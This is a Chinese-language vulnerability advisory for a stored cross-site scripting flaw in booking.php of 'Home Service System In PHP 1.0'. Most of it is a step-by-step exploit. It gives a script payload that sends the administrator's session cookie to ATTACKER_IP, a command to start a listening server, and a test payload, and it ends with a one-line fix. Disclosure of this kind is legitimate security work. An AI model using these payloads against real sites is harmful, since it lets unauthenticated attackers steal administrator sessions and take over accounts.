| 字段 | 详情 |
|---|
| 供应商 | code-projects.org |
| 产品 | Home Service System In PHP |
| 版本 | 1.0 |
| 漏洞类型 | 存储型跨站脚本(XSS) |
| CWE | CWE-79 |
| 是否需要认证 | 否 |
| 作者 | Imad Alvi |
Home Service System In PHP 1.0 的 booking.php 文件中存在存储型跨站脚本(XSS)漏洞。未认证用户可以通过预订表单字段注入恶意 JavaScript 载荷。未经过滤的输入被存储在数据库中,并在管理面板(admin.php)中未经输出编码直接渲染,从而在管理员的浏览器上下文中执行。
这使得未认证攻击者能够窃取管理员会话 Cookie、以管理员身份执行操作,或完全接管管理员账户。
booking.phpfname、lnameadmin.php → 管理预订以未认证用户身份导航至预订页面: http://TARGET/homeservices/booking.php?provider=
在名字字段中注入以下载荷:
<script>new Image().src="http://ATTACKER_IP:PORT?c="+document.cookie</script>
使用任意有效数据填写其余字段并提交预订。
在攻击者机器上启动监听器:
php -S 0.0.0.0:PORT
等待管理员访问 admin.php 中的管理预订部分。
载荷在管理员的浏览器中执行,将会话 Cookie 外泄至你的监听器。

<script>alert(1)</script>

<script>new Image().src="http://ATTACKER_IP:7979?c="+document.cookie</script>
该漏洞允许远程未认证攻击者完全攻陷应用程序。
攻击者可以:
PHPSESSID 会话 Cookiehtmlspecialchars() 配合 ENT_QUOTES 进行过滤